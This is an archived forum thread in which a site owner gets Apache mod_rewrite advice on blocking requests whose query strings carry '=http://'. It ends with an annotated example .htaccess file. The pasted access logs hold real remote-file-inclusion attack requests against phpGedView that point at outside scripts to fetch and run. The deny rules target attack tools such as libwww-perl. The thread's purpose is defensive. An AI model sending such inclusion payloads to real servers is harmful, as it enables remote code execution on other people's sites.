This is a discussion on Redirection based on Query string within the alt.comp.lang.php forums, part of the PHP Programming Forums category.
Hi.

I'm very new to PHP, and just want to stop some attacks, and spammers.

They all are using =http:// in the query string, I know that I will stop some other visitors too.

Is it possible to put a script in my index.php to redirect people / robots using such commands / remote attacks? If so, I would like an example please!

I would like to redirect them to another place that is banning them from my site.

I've tried using query_string in htaccess without any luck.

Thank you.

Regards,
Trond

Reffo wrote:
> Hi.

Hi Reffo,

> I'm very new to PHP, and just want to stop some attacks, and spammers.
>
> They all are using =http:// in the query string,

Not a PHP answer, but as you are using Apache, you might try

    RewriteEngine on
    RewriteCond %{QUERY_STRING} .*http:\/\/.*
    RewriteRule ^(.*) /ignore [F]

This will return a "forbidden 403" error to any URL where the query string contains http:// anywhere in it.

> I know that I will stop some other visitors too.

Nah. I can't think of a legitimate visitor ever needing to put this in the query string.

> Is it possible to put a script in my index.php to redirect people / robots
> using such commands / remote attacks? If so, I would like an example please!

It could be done with PHP, but the above will be quicker, and cover all file pages, not just index.php.

> I would like to redirect them to another place that is banning them from my
> site.

I don't understand what this means.

You could send them elsewhere with

    RewriteRule ^(.*) http://www.elsewhere.com/ [L]

in place of the RewriteRule above.

> I've tried using query_string in htaccess without any luck.

You can place the code above in server config (anywhere in httpd.conf), virtual host, directory, or .htaccess context. For .htaccess to work, AllowOverride must not be None.

For anything to work, mod_rewrite must be loaded, i.e. you find a line in httpd.conf that is like...

    LoadModule rewrite_module modules/mod_rewrite.so

And remove any leading #

Regards
Ian

"Ian Hobson" <ian.hobson@ntlworld.com> wrote in message news:ZtGEi.28744$Db6.19105@newsfe3-win.ntli.net...
> Reffo wrote:
>> Hi.
>
> Hi Reffo,
>
>> I'm very new to PHP, and just want to stop some attacks, and spammers.
>>
>> They all are using =http:// in the query string,
>
> Not a PHP answer, but as you are using Apache, you might try
>
> RewriteEngine on
> RewriteCond %{QUERY_STRING} .*http:\/\/.*
> RewriteRule ^(.*) /ignore [F]
>
> This will return a "forbidden 403" error to any URL where the query string
> contains http:// anywhere in it.
>
>> I know that I will stop some other visitors too.
>
> Nah.
> I can't think of a legitimate visitor ever needing to put this in the
> query string.

Hi.

Yes, the AltaVista translator and other web-based translators are using =http

But, thank you. At least I have a start for now, I've tested it, and it's working. The bad behaviors are written in the htaccess file.

If I find any legal engine that uses these strings, I only have to remove them from the htaccess file. They won't be banned anymore.

Thank you once again!

Regards,
Trond

>> Is it possible to put a script in my index.php to redirect people /
>> robots using such commands / remote attacks? If so, I would like an
>> example please!
>
> It could be done with PHP, but the above will be quicker, and cover all
> file pages, not just index.php.
>
>> I would like to redirect them to another place that is banning them from
>> my site.
>
> I don't understand what this means.
>
> You could send them elsewhere with
>
> RewriteRule ^(.*) http://www.elsewhere.com/ [L]
>
> in place of the RewriteRule above.
>
>> I've tried using query_string in htaccess without any luck.
>
> You can place the code above in server config (anywhere in httpd.conf),
> virtual host, directory, or .htaccess context. For .htaccess to work,
> AllowOverride must not be None.
>
> For anything to work, mod_rewrite must be loaded, i.e. you find a line in
> httpd.conf that is like...
>
> LoadModule rewrite_module modules/mod_rewrite.so
>
> And remove any leading #
>
> Regards
>
> Ian

On Sep 9, 4:33 am, "Reffo" <min_onkels_nevoe@varm_mail.com> wrote:
> "Ian Hobson" <ian.hob...@ntlworld.com> wrote in message news:ZtGEi.28744$Db6.19105@newsfe3-win.ntli.net...
>
> > Reffo wrote:
> >> Hi.
>
> > Hi Reffo,
>
> >> I'm very new to PHP, and just want to stop some attacks, and spammers.
>
> >> They all are using =http:// in the query string,
>
> > Not a PHP answer, but as you are using Apache, you might try
>
> > RewriteEngine on
> > RewriteCond %{QUERY_STRING} .*http:\/\/.*
> > RewriteRule ^(.*) /ignore [F]
>
> > This will return a "forbidden 403" error to any URL where the query string
> > contains http:// anywhere in it.
>
> >> I know that I will stop some other visitors too.
>
> > Nah.
> > I can't think of a legitimate visitor ever needing to put this in the
> > query string.
>
> Hi. Yes, the AltaVista translator and other web-based translators are using
> =http
>
> But, thank you. At least I have a start for now, I've tested it, and it's
> working.
> The bad behaviors are written in the htaccess file.
>
> If I find any legal engine that uses these strings, I only have to remove
> them from the htaccess file. They won't be banned anymore.
>
> Thank you once again!
>
> Regards,
> Trond
>
> >> Is it possible to put a script in my index.php to redirect people /
> >> robots using such commands / remote attacks? If so, I would like an
> >> example please!
>
> > It could be done with PHP, but the above will be quicker, and cover all
> > file pages, not just index.php.
>
> >> I would like to redirect them to another place that is banning them from
> >> my site.
>
> > I don't understand what this means.
>
> > You could send them elsewhere with
>
> > RewriteRule ^(.*) http://www.elsewhere.com/ [L]
>
> > in place of the RewriteRule above.
>
> >> I've tried using query_string in htaccess without any luck.
>
> > You can place the code above in server config (anywhere in httpd.conf),
> > virtual host, directory, or .htaccess context. For .htaccess to work,
> > AllowOverride must not be None.
>
> > For anything to work, mod_rewrite must be loaded, i.e. you find a line in
> > httpd.conf that is like...
>
> > LoadModule rewrite_module modules/mod_rewrite.so
>
> > And remove any leading #
>
> > Regards
>
> > Ian

You could also install the mod_security module and visit the "cool rules" project to get a load of rules to protect your server from all kinds of attacks, not just the one you mentioned. I recommend this as it gives you peace of mind when you see worms and other nasties in your logs.

> you could also install the mod_security module and visit the "cool
> rules" project to get a load of rules to protect your server from all
> kinds of attacks, not just the one you mentioned. I recommend this as
> it gives you peace of mind when you see worms and other nasties in
> your logs.

As I don't have my own IP yet, I'm renting it from my host, including space. It's very free, but, ................

>> They all are using =http:// in the query string,
>
> Not a PHP answer, but as you are using Apache, you might try
>
> RewriteEngine on
> RewriteCond %{QUERY_STRING} .*http:\/\/.*
> RewriteRule ^(.*) /ignore [F]

I've checked my server logs and it seems like this doesn't catch everyone who is using this command.

Regards,
Trond

Reffo wrote:
>>> They all are using =http:// in the query string,
>> Not a PHP answer, but as you are using Apache, you might try
>>
>> RewriteEngine on
>> RewriteCond %{QUERY_STRING} .*http:\/\/.*
>> RewriteRule ^(.*) /ignore [F]
>>
> I've checked my server logs and it seems like this doesn't catch everyone
> who is using this command.

Hi Reffo,

Can you post the relevant part of your log file, so I can see what is going wrong?

Regards
Ian

> Hi Reffo,
>
> Can you post the relevant part of your log file, so I can see what is
> going wrong?
>
> Regards
>
> Ian

Hi.

Here's one example:

    66.118.176.78 - - [09/Sep/2007:08:35:14 +0200] "GET /index.php?newlang=norwegian/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http ://darkness.ws/xpl/bot/id.txt? HTTP/1.1" 302 340 "-" "libwww-perl/5.807"

    66.118.176.78 - - [09/Sep/2007:08:35:19 +0200] "GET /help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http ://darkness.ws/xpl/bot/id.txt? HTTP/1.1" 302 301 "-" "libwww-perl/5.807"

As you see, the person is getting a 302, but is not redirected.

Here's another log where the person is getting a 501 error:

    cpanel.fs-host.com - - [09/Sep/2007:17:29:14 +0200] "GET /index.php?name=Downloads&file=details&id=14/phpGedView/individual.php?PGV_BASE_DIRECTORY=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.1" 501 215 "-" "libwww-perl/5.808"

    cpanel.fs-host.com - - [09/Sep/2007:17:29:15 +0200] "GET /phpGedView/individual.php?PGV_BASE_DIRECTORY=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.1" 501 231 "-" "libwww-perl/5.808"

Regards,
Trond

> Hi Reffo,
>
> Can you post the relevant part of your log file, so I can see what is
> going wrong?
>
> Regards
>
> Ian

Here's the part of the htaccess file regarding this redirection:

    RewriteEngine On

    RewriteCond %{QUERY_STRING} .*http:\/\/.* [NC,OR]
    RewriteCond %{QUERY_STRING} .*http%3A%2F%2F.* [NC]
    RewriteRule ^(.*) /btrap [R,L]

    RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^lwp [NC]
    RewriteRule ^(.*) /btrap/index.php [R,L]

    RewriteCond %{HTTP_REFERER} \.cn [NC,OR]
    RewriteCond %{HTTP_REFERER} moretrash\.com
    RewriteRule .* - [F]

-Trond

Reffo wrote:
>> Hi Reffo,
>>
>> Can you post the relevant part of your log file, so I can see what is
>> going wrong?
>>
>> Regards
>>
>> Ian
>>
> Hi.
>
> Here's one example:
>
> 66.118.176.78 - - [09/Sep/2007:08:35:14 +0200] "GET
> /index.php?newlang=norwegian/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http ://darkness.ws/xpl/bot/id.txt?
> HTTP/1.1" 302 340 "-" "libwww-perl/5.807"
>
> 66.118.176.78 - - [09/Sep/2007:08:35:19 +0200] "GET
> /help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http ://darkness.ws/xpl/bot/id.txt?
> HTTP/1.1" 302 301 "-" "libwww-perl/5.807"
>
> As you see, the person is getting a 302, but is not redirected.

The code was giving the 302, because that is what the [F] told it to do.

I think you need 3 lines in your .htaccess file only

    RewriteEngine on
    RewriteCond %{QUERY_STRING} .*http:\/\/.* [NC]
    RewriteRule ^/(.*) /btrap/index.php [L,R]

This will send them to your /btrap/index.php file, where you can create a suitable page for them.

If you want to send them to another site, the last line is...

    RewriteRule ^/(.*) http://fully.qualified.domain.name/$1 [L,R]

I don't think the other entries are necessary.

Regards
Ian
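
A loop-safe variant of the query-string filter discussed in this thread, as an added example that is not part of any poster's message. It assumes a .htaccess file in the document root and the /btrap/ trap directory named in the thread; the scheme list (https?|ftp) is an assumption.

```apache
# Added example, not from the thread. Assumes a .htaccess file in the
# document root and the /btrap/ directory mentioned by the poster.
RewriteEngine On

# 1. Refuse requests whose query string carries "=<scheme>://".
#    In .htaccess the RewriteRule pattern is matched against the path
#    without its leading slash, so "^" is used to match every request.
#    %{QUERY_STRING} is compared undecoded, so the pattern accepts both
#    the literal "://" and its percent-encoded form (%3A%2F%2F). [NC]
#    also covers %3a%2f%2f. Double-encoded values (%253A) are not covered.
#    Pages that legitimately take a URL parameter, such as the web
#    translators mentioned in the thread, will match as well.
RewriteCond %{QUERY_STRING} =(https?|ftp)(:|%3A)(/|%2F)(/|%2F) [NC]
RewriteRule ^ - [F]

# 2. Alternative to rule 1: redirect to the trap page instead of refusing.
#    An [R] redirect keeps the original query string unless the target
#    ends in "?", so without the "?" the redirected request would still
#    contain "=http://" and match this rule again. The REQUEST_URI guard
#    keeps the trap page itself out of the rule in any case.
#RewriteCond %{REQUEST_URI} !^/btrap/
#RewriteCond %{QUERY_STRING} =(https?|ftp)(:|%3A)(/|%2F)(/|%2F) [NC]
#RewriteRule ^ /btrap/index.php? [R=302,L]

# 3. User-agent filter from the thread, answered with 403 rather than a
#    redirect: a redirected client sends the same User-Agent again, so a
#    redirect rule keyed on the agent alone would match its own target.
RewriteCond %{HTTP_USER_AGENT} ^(libwww-perl|lwp) [NC]
RewriteRule ^ - [F]
```

The status column of the access log shows which rule answered: 403 for rules 1 and 3, 302 followed by a request for /btrap/index.php for rule 2.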